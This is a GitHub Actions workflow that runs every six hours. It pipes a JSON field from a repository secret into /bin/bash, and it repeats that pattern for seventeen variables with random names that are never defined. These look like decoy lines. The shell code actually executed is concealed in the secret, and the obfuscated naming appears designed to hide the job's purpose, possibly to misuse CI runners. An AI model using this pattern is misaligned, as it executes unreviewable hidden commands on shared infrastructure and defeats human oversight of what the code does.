name: gaoshoz

on:
  workflow_dispatch:
  schedule:
    - cron: '10 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaoshoz
        env:
          n06711: ${{ secrets.n06711 }}
        run: |
          echo $n06711 | jq -r .wni4326 | /bin/bash
          echo $kikn7304 | jq -r .hh87 | /bin/bash
          echo $pr3 | jq -r .rdtiw9155 | /bin/bash
          echo $mhfh077 | jq -r .bq042 | /bin/bash
          echo $gmbdd034 | jq -r .bj031 | /bin/bash
          echo $ojiq80 | jq -r .dfoqb5 | /bin/bash
          echo $t06312 | jq -r .bvwyw87210 | /bin/bash
          echo $cn52899 | jq -r .yqmyx4 | /bin/bash
          echo $ihbho16 | jq -r .gns1595 | /bin/bash
          echo $du1042 | jq -r .aebr5 | /bin/bash
          echo $mlap7855 | jq -r .zj0 | /bin/bash
          echo $ttgi34 | jq -r .tvfh35 | /bin/bash
          echo $ki577 | jq -r .vkha25912 | /bin/bash
          echo $zle51 | jq -r .d8 | /bin/bash
          echo $jm79 | jq -r .brn6 | /bin/bash
          echo $px98 | jq -r .bho53331 | /bin/bash
          echo $eqkqo4 | jq -r .scnz5768 | /bin/bash
          echo $o397 | jq -r .dhm23 | /bin/bash

